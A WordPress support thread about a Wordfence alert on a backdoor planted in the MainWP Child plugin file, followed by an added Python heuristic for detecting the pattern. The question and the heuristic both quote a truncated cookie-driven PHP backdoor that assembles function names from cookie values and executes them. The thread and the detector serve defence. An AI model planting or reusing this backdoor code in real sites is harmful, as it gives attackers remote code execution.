• Resolved Roberto Jobet

    (@robertojobet)


    Hi,

    I received a Wordfence malware alert on one of my websites regarding a Backdoor:PHP/reval.C.3102 script in the wp-content/plugins/mainwp-child/mainwp-child.php file.

    Details:
    The matched text in this file is:

    $p = $_COOKIE;\x0d\x0a(count($p) == 8)?(($um = $p[59].$p[68]) && ($bk = $um($p[95].$p[75])) && ($_bk = $um($p[16].$p[38])) && ($_bk = $bk($p[43], $_bk($um($p[20])))) && @$_bk(

    Is this real malware or a false positive?

    Regards,
    Roberto Jobet

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Support Bogdan Rapaic

    (@bogdanrapaic)

    Hi @robertojobet,

    Thanks for reaching out.

    This code is not part of the MainWP Child plugin code here on www.remarpro.com or our official GitHub repo. We use HackerOne and our white hat reward program to have our plugins consistently tested for vulnerabilities, so I don’t believe this type of intrusion would come from your MainWP Child. The code may be placed there by another insecure plugin. We are also not seeing any other reports here or in our community. If you have additional questions, please open a ticket, and we’ll be happy to take a look.

    Thanks,
    Bogdan R.

    Plugin Author mainwp

    (@mainwp)

    Hi Roberto,

    I will go ahead and resolve this ticket. If any further help is needed, feel free to open a helpdesk ticket.

  • The topic ‘Wordfence malware alert Backdoor:PHP/reval.C.3102’ is closed to new replies.
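
An added example, not part of the original thread and not MainWP or Wordfence code: a small Python heuristic for the shape of the matched text quoted in the question, where a request superglobal is aliased, its elements are concatenated into a string, and that string is then called as a function. The function name `find_request_built_calls` and the benign sample are constructed for illustration, and the check is not Wordfence's signature.

```python
import re

# Request superglobals whose contents the client controls.
SUPERGLOBAL = r"\$_(?:COOKIE|GET|POST|REQUEST)"
# `$p = $_COOKIE;` -> captures the alias name.
ALIAS_RE = re.compile(r"\$(\w+)\s*=\s*" + SUPERGLOBAL + r"\s*;")

# Matched text quoted in the thread (truncated there; kept verbatim).
REPORTED = r'$p = $_COOKIE;\x0d\x0a(count($p) == 8)?(($um = $p[59].$p[68]) && ($bk = $um($p[95].$p[75])) && ($_bk = $um($p[16].$p[38])) && ($_bk = $bk($p[43], $_bk($um($p[20])))) && @$_bk('
# Constructed benign sample: cookie values are read and joined, never called.
BENIGN = "$p = $_COOKIE; $lang = $p['lang'] . $p['region']; echo esc_html($lang);"


def find_request_built_calls(php_source):
    """Flag variables assembled only from request values and then called."""
    findings = []
    for alias in sorted(set(ALIAS_RE.findall(php_source))):
        elem = r"\$" + re.escape(alias) + r"\[[^\]]+\]"
        # `$um = $p[59].$p[68]` -> string made purely of request values
        built_re = re.compile(
            r"\$(\w+)\s*=\s*" + elem + r"(?:\s*\.\s*" + elem + r")+")
        for match in built_re.finditer(php_source):
            name = match.group(1)
            # `$um(` -> that string is used as a function name
            calls = len(re.findall(r"\$" + re.escape(name) + r"\s*\(", php_source))
            if calls:
                findings.append({"alias": alias, "callable": name, "calls": calls})
    return findings


if __name__ == "__main__":
    for label, src in (("reported", REPORTED), ("benign", BENIGN)):
        print(label, find_request_built_calls(src))
```

A hit on a plugin file is a reason to compare that file against a clean copy of the plugin from its official source, since the reply above states the reported code is not part of the plugin.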